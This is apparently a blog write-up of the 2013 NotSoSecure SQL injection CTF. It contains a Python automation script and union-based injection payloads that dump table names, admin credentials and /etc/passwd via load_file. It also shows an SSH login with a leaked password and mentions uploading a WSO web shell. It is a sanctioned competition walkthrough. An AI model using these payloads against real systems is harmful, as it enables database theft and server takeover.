NotSoSecure SQLi CTF – writeup

Access to challenge using a proxy like burp or zap and submit data to login. Notice the forwarded to:
http://ctf.notsosecure.com/71367217217126217712/checklogin.php that contains: 7365637265745f72656769737465722e68746d6c

This could be decoded ‘7365637265745f72656769737465722e68746d6c’.decode(‘hex’) in python to read secret_register.html

>>> '7365637265745f72656769737465722e68746d6c'.decode('hex')
'secret_register.html'

The registration page offers four fields that, when you register, create some session_id encoded in base64 which contains your email.

Read a hint launch on twitter (https://twitter.com/notsosecure/status/389714333061500928) about magic_quotes. It is a big hint !

We  ‘pythonautomaticated’ our attack:

#!/usr/bin/python
from requests import get, post
from random import randint
from sys import argv
from urllib import quote, unquote
name = argv[-3]
password = argv[-2]
email = argv[-1]

print 'name:', name
print 'password:', password
print 'email:', email
url1='http://ctf.notsosecure.com/71367217217126217712/register.php'
url2='http://ctf.notsosecure.com/71367217217126217712/checklogin.php'
url3='http://ctf.notsosecure.com/71367217217126217712/uber_secret.php'

r = get(url1, params={'regname':name, 'regemail':email, 'regpass1':password, 'regpass2':password})
r = post(url2, data={'myusername':name, 'mypassword':password}, cookies=r.cookies)
r = get(url3, cookies=r.cookies)
print 'cookie:', unquote(r.cookies['session_id']).decode('base64')

See name of the table (users)

root@bt:~# python x.py "-1' union select GROUP_CONCAT(table_name),2 FROM information_schema.tables where table_schema!='information_schema' -- -" "a" "a"
name: -1' union select GROUP_CONCAT(table_name),2 FROM information_schema.tables where table_schema!='information_schema' -- -
password: a
email: a
seesion_id: users
dXNlcnM%3D

fields on table:

root@bt:~# python x.py " -1' union select GROUP_CONCAT(column_name),2 FROM information_schema.columns WHERE table_name = 'users' -- -" "a" "a"
name: -1' union select GROUP_CONCAT(column_name),2 FROM information_schema.columns WHERE table_name = 'users' -- -
password: a
email: a
seesion_id: id,name,password,email
aWQsbmFtZSxwYXNzd29yZCxlbWFpbA%3D%3D

final data:

root@bt:~# python x.py " -1' union select GROUP_CONCAT(id,name,password,email),2 FROM users where name='admin' -- -" "a" "a"
name: -1' union select GROUP_CONCAT(id,name,password,email),2 FROM users where name='admin' -- -
password: a
email: a
seesion_id: 1adminsqlilabRocKs!!admin@sqlilabs.com
MWFkbWluc3FsaWxhYlJvY0tzISFhZG1pbkBzcWxpbGFicy5jb20%3D

We login with admin:adminsqlilabRocKs and get the flag: «Well done, Flag is 815290. 2nd flag is in file secret.txt»

Screenshot-2

 

We use the same client to read /etc/passwd. See a user temp123 with weakpassword1.

root@bt:~# python x.py " -1' union select load_file('/etc/passwd'),2 -- -" "a" "a"
name: -1' union select load_file('/etc/passwd'),2 -- -
password: a
email: a
seesion_id:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:107:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ctf:x:1000:1000:,,,:/home/ctf:/bin/bash
temp123:x:1001:1001:weakpassword1:/home/temp123:/bin/sh
ntop:x:108:116::/var/lib/ntop:/bin/false

Login time

temp123@ctf.notsosecure.com's password:
Welcome to Ubuntu 12.04.3 LTS (GNU/Linux 3.8.0-29-generic x86_64)

* Documentation: https://help.ubuntu.com/

System information as of Fri Oct 25 08:47:07 BST 2013

System load: 0.0 Processes: 174
Usage of /: 4.5% of 28.18GB Users logged in: 2
Memory usage: 3% IP address for eth0: 88.208.239.33
Swap usage: 0%

Graph this data and manage this system at https://landscape.canonical.com/

Last login: Fri Oct 25 08:37:55 2013 from cpc26-cmbg15-2-0-cust101.5-4.cable.virginm.net
$ pwd
/home/temp123

Upload a wso shell into public_html of the user. Delete php shell

$ cat /secret.txt
Well done, 2nd Flag is 128738213812990.

email both the flags to ctf@notsosecure.com with subject CTF FLAGS!

make sure you delete all the files you have created on the server so you dont allow other users easy points by using the files left by you on the server.

Please provide a detailed write up to qualify for cash prize!
The person with best write-up wins. You are allowed to publish the write-up on public site, but please do this after the CTF has finished (sunday, 27th October).

Hope you enjoyed the CTF. This was taken from one of challenges we have on SQLi Labs. To practice more on this visit our SQLi Labs.

The next public CTF will take place in December.

Thanks
Sid
References & URL’s

http://ctf.notsosecure.com/leaderboard/

No hay contenido relacionado



2 comentarios

  1. I’m really impressed with your writing skills as well as with the layout on your blog.
    Is this a paid theme or did you customize it yourself?
    Either way keep up the excellent quality writing, it’s rare to see a nice blog like this one nowadays.

Deja una respuesta

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.